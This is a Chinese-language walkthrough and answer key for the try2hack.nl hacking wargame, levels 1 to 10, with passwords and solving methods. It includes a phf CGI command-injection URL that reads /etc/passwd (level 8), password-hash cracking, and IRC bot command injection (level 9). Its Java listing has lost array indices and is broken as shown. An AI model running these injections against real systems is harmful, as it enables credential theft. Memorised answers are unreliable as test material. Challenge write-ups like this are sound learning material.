旧版的完整答案及解密方法:
但是前几关内容好象基本没有变 密码变了
换汤不换药
下文仅供参考 下文仅供参考 下文仅供参考
旧版的完整答案及解密方法:
第一关:
地址:http://www.try2hack.nl/level1.html
密码:hackerzzz
解密方法:查看源文件,你会看到javascript写的验证表单脚本,里面有你想要的密码。
第二关:
地址:http://www.try2hack.nl/Levvel2.html
密码:Try2Hack NokiaIsGood
解密方法:这是一个FLASH的验证程序。这里有两个方法。第一种方法:查看源文件,把FLASH的.swf文件下载到本地,然后用记事本打开它,详细看看你会发现密码。第二种方法:同样是下载.swf然后找个FLASH的action反编译软件,同样可以找到密码。
第三关:
地址: http://www.try2hack.nl/LLeVeLL3.html
密码:TheCorrectAnswer
解密方法:这也是一个Javascript,应该很简单,不过开始时还是被它骗了!有两种方法。第一种:用netants或者其它下载它的源文件,打开后,你会看到一行<script src="Javascript">script>,不要被骗了,看到那个src=...吗,它是直接调用一个无后缀的文件,我们在地址栏里键入:http://www.try2hack.nl/Java<;I>script就可以看到密码了。第二种:在IE缓存里,找一个文件名为Javascript无扩展名的文件,打开它,就会看到过关密码了。
第四关:
地址:http://www.try2hack.nl/thelevel4.html
密码:Try2Hack AppletsAreEasy
解密方法:这里到了JavaApplet了,开始有点难度了。打开IE缓存,我们可以找到一个叫做level4的文本文件,用记事本查看它,就可以看到密码了。
第五关:
地址:http://www.try2hack.nl/5_level_5.html
密码:Try2Hack OutOfInspiration
解密方法:这个到了软件方面了,进入后,下载它的程序,是VB3写的,w32dasm反汇编它,win3.x编译的程序,太老了,看不懂。干脆想办法反编译,这是VB3的可以反编译,俺是个crack迷,有现成工具VB Decompiler可
以用,把它反编译吧,看看编译出来的.bas吧:
Option Explicit
Const mc001A =
"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,:;-*+=~|&!_$#@()[]{}<\/>"
Const mc001E = "http://www.try2hack.f2s.com/login-level6.html";
Const mc0022 = " txtUsername=AlmostAHacker "
Const mc0026 = " txtPassword=ZqrE01A2d "
Sub chkHidePwd_Click ()
If chkHidePwd.value = 0 Then
txtPassword.PasswordChar = ""
Else
txtPassword.PasswordChar = "*"
End If
End Sub
Sub cmdLogin_Click ()
Dim l003C As String
Dim l003E As variant
If txtUsername <> Mid(mc001A, 56, 1) & Mid(mc001A, 28, 1) & Mid(mc001A, 35, 1) & Mid(mc001A, 3,
1) & Mid(mc001A, 44, 1) & Mid(mc001A, 11, 1) & Mid(mc001A, 13, 1) & Mid(mc001A, 21, 1) Then
MsgBox "Username not accepted."
Exit Sub
End If
If txtPassword <> Mid(mc001A, 51, 1) & Mid(mc001A, 31, 1) & Mid(mc001A, 30, 1) & Mid(mc001A, 51,
1) & Mid(mc001A, 16, 1) & Mid(mc001A, 45, 1) & Mid(mc001A, 24, 1) & Mid(mc001A, 29, 1) &
Mid(mc001A, 26, 1) & Mid(mc001A, 19, 1) & Mid(mc001A, 28, 1) & Mid(mc001A, 11, 1) & Mid(mc001A,
30, 1) & Mid(mc001A, 19, 1) & Mid(mc001A, 25, 1) & Mid(mc001A, 24, 1) Then
MsgBox "Username/Password don't match."
Else
MsgBox "User logged in !"
l003C$ = Left$(mc001E, 28) & Mid(mc001A, 22, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 15, 1) &
Mid(mc001A, 67, 1) & Mid(mc001A, 32, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 15, 1) & Mid(mc001A,
67, 1) & Mid(mc001A, 22, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 7, 1) & Mid(mc001A, 63, 1) &
Mid(mc001A, 18, 1) & Mid(mc001A, 30, 1) & Mid(mc001A, 23, 1) & Mid(mc001A, 22, 1)
MsgBox "For Windows NT / Windows 2000 users :" & Chr$(13) & Chr$(10) & Chr$(13) & Chr$(10) &
l003C$
l003E = Shell("start " & l003C$)
End If
End Sub
看到了么,上面是VB程序,上面定义了:
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,:;-*+=~|&!_$#@()[]{}<\/> ,其中Mid(mc001A, 56, 1) 表示从第56个字符起,取一个字符,即T,Mid(mc001A, 28, 1)就表示r,依次类推,到最后密码就会出现在你眼前了。
第六关:
地址:http://www.try2hack.nl/l-e-v-e-l-6.html (上一关的程序提示的地址有误,可能太旧了,把网址改过来就行了,文件名不变)
密码:LORD LANPARTY
解密方法:大家下个winsock expert v0.3,到搜狐搜索一下,可以找到的。如果你有防火墙也可以用的,下载好后,打开,运行level6.exe, 把它打开,好了,然后乱写密码,点击login。你会看到send /p.lv6, 看到了吗,到浏览器里打入http://www.try2hack.nl/p.lv6, 出来个空白页,看他的源文件,哈,如下
(ENCRYPTION TYPE)
B*C*N**N
(USERNAME)
ababa abbab baaaa aaabb
(PASSWORD)
ababa aaaaa abbaa abbba aaaaa baaaa baaba babba
(PAGE)
ababa aabaa baabb aabaa ababa baaab aabaa baabb aabaa abbaa
这里搞了我好久,哈,这个作者,真王八蛋, 什么B*C*N**N , 后来,找啊找哈,解码如下:
BACONIAN <- 这就是那什么 B****N 的。
懂密码解码学么?让我说说吧,这里a=0,b=1
ASCII码中是按顺序由A到Z排的,
第一个是A,为00000也就是aaaaa
(学过编程就知道,一般程序记数是从0开始的)
所以B当然是00001,相当于aaaab
C是00010,即aaaba ,类推后就是:
A = aaaaa E = aabaa I/J= abaaa N = abbaa R = baaaa W = babaa
B = aaaab F = aabab K = abaab O = abbab S = baaab X = babba
C = aaaba G = aabba L = ababa P = abbba T = baaba Y = babba
D = aaabb H = aabbb M = ababb Q = abbbb U/V= baabb Z = babbb
解码后,哈,密码出来了吧!
第七关:
地址:http://www.try2hack.nl/LEVELSEVEN.html
密码:不用密码的
解密方法: 按上面的地址进入后,它会叫你到另一页面:http://www.try2hack.nl/cgi-bin/level7.pl 内容
如下:Browser check :Sorry, but you must use Microsoft Internet Explorer 6.72 OS check :Sorry,
but you must use a UNIX/LINUX system. Link check :Sorry, but you must get here from a link on the page: http://www.microsoft.com/ms.htm
看懂了吗?这个是检测浏览器和操作系统等等的。要求浏览器是IE 6.72版,操作系统是UNIX/LINUX,要求从网址http://www.microsoft.com/ms.htm里的链接进入这个页面才能通过。天哪!怎么可能,IE什么时候出了6.72版了!!而且不能在UNIX/LINUX下运行的呀!!还要求从微软网址链接过来呢!!!怎么可能啊!!我倒,分明是开玩笑!不过,不用担心,我们来招欺骗手段就行了。
先去下载一个叫curl的软件!下载地址:http://curl.haxx.se/download.html
下那个win32的,不用ssl, 然后,解压到C盘根目录(其它也可以),关掉浏览器,进入命令控制台,即DOS下(要求你的系统是WINNT/2K/XP才行) ,打入以下命令
c:\>curl -A "Mozilla/4.0 (compatible; MSIE 6.72; Linux 2.2.15 i686)" -e http://www.microsoft.com/ms.htm http://www.try2hack.nl/cgi-bin/level7.pl
你就会看到:
Try2Hack
Browser check :
OK
OS check :
OK
<
B>Link check :
OK
Level 8
P
assword for the messageboard is : TonyHawk2
就搞到Level-8.html了吧,哈哈!开心~~
第八关:
地址:http://www.try2hack.nl/Level-8.html
密码:BuiZe arsanik
解密方法:这一关真正到了HACK的阶段了。进入这个页面后,随便填个用户名,密码,点lgoin,仔细看看状态栏吧,你会看到http://www.try2hack.nl/cgi-bin/phf.cgi,或者直接查看原文件,这个表单会post到cgi-bin/phf.cgi的。如果你是一个HACK的话,这里有一个词是不是很眼熟?对,就是phf!还记得这个漏洞吗?woo,一个很老的漏洞,但这里要用上了。查一查资料,唔,找到了,在地址栏里打入:
http://www.try2hack.nl/cgi-bin/phf.cgi?Qalias=x%0a/bin/cat%20/etc/passwd
好极了,出现BuiZe:Bu3kOx4cCMX2U,冒号前是用户名,后面是加密了的密码,挂个john the ripper 跑去了哦!跑完后密码就出来了。
第九关:
地址:没有地址的
密码:不用密码
解密方法:去下载一个mIRC,登入irc.quakenet.org
在#try2hack.level9的房间里输入以下命令:
/ctcpreply LEVEL9-xxx PING 1 * [adduser "username" "username!user@host"]
/ctcpreply level9-xxx ping 1 - [string length "[chattr user "+n"]"]
/msg level9-xxx pass yourpasswd
为什么会用level9-xxx呢?看下面:
* LEVEL9-982 is now known as LEVEL9-470
* LEVEL9-470 is now known as LEVEL9-340
* LEVEL9-340 is now known as LEVEL9-811
第十关:
地址:http://www.try2hack.nl/the_l_e_v_e_l_10.php
密码:OwYouDidIt
解密方法:这一关是编程题目,是JAVA编程。要求根据下面的程序算出的字符串.3x#7.5x#6.6x#3.5x#9#4.2x#1.7x#5.5x#8.6x#0.10x#2.3x# ,推算出str的值是什么。
整个程序如下,把下面的程序倒过来,把上面的字符串当原始字符,就可以算出密码。
import java.io.*;
import java.util.StringTokenizer;
class Letter
{
private String place;
public Letter()
{
this.place = "";
}
public String getPlace()
{
return place;
}
public void addLocation(int x)
{
place = place.concat(Integer.toString(x));
}
}
public class Level10
{
public static void main (String [] args) throws IOException { cut(rot()); }
public static String rot() throws IOException
{
String str = "String";
String x = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ#";
int [] a = new int [x.length()];
Letter [] b = new Letter [x.length()];
String rot = "";
for (int i = 0; i < x.length(); i++)
{
int m = 0;
b = new Letter();
for (int n = 0; n < str.length(); n++)
if (str.charAt(n) == x.charAt(i))
b.addLocation (n);
}
for (int i = 0; i < x.length(); i++)
{
rot = rot + b.getPlace() + '#';
}
return rot;
}
public static void cut(String rot) throws IOException
{
StringTokenizer tokenizer = new StringTokenizer(rot, "0123456789", true);
while(tokenizer.hasMoreTokens())
{
String next = tokenizer.nextToken();
if(next.indexOf('#') == -1) System.out.print(next);
else
{
int i = next.length();
if(i > 1) System.out.print("." + i + "x#");
else System.out.print('#');
}
}
System.out.println();
}
}
过了第十关后,会有如下提示:
Well Done
The password you have provided is correct.
Please check back with us to see when level 11 is ready, you will have to keep the password in order to come to this page again.
似乎第十一关作者还没做好。好了,到这里结束了。
|
